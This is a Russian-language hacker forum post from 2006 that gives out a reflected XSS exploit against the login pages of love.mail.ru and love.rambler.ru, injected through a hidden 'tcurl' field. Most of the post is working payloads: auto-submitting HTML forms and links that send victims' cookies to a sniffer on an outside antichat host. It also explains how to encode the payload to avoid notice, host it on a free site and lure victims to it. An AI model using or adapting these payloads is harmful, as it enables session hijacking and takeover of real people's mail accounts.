ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу XSS mail.ru rambler.ru
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS mail.ru rambler.ru
  #1  
Старый 04.12.2006, 20:40
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию XSS mail.ru rambler.ru
Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

Старый добрый дядя slider вам расскроет тайну Да.. да... прям возьмём и угоним сессию..

Короче ... дело было вечером .. делать было нечего..
и полез я искать уязвимости на этих почтовиках..

После многих часов поиска (уважайте чужой труд! ) нашол таки...
в файле http://love.mail.ru/my/login.phtml скрытую строку:
Код HTML:
<input type="hidden" name="tcurl">
Да да... именно она слабое звено!...
паразитка такая не фильтруетсо =)

вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


А вот тут по сценарию вам надо дать exploit ))
С переадрессацией и со всеми наворотами ))

А вот он б*я =)

майл.ru

Код HTML:
<body onload="p.submit()">
<form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>
рамблер.ru


Код HTML:
<body onload="p.submit()">
<form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
<input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

А вот причём... кука прийдёт и от лов и от майла! =)
Так что статейка думаю многим пригодистя =)

Ну что.. время пошло кто не успел тот опоздал... =)
Торопитесь время акции ограничего =)

С уважением slider


Ахх да... как юзать ))
Сохраняете этот "сплойт" в html и качаете на народ.ru
далее даёте ссылку комунить на свой "скрипт"... ))
Удачи!..

Вот вам ещё скриптеГ =)

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

Код HTML:
http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
Последний раз редактировалось slider; 05.12.2006 в 17:48..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Реализация XSS на rambler.ru Майор E-Mail 8 21.09.2006 20:50
Xss на mail.ru em00s7 E-Mail 14 08.06.2006 00:38
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ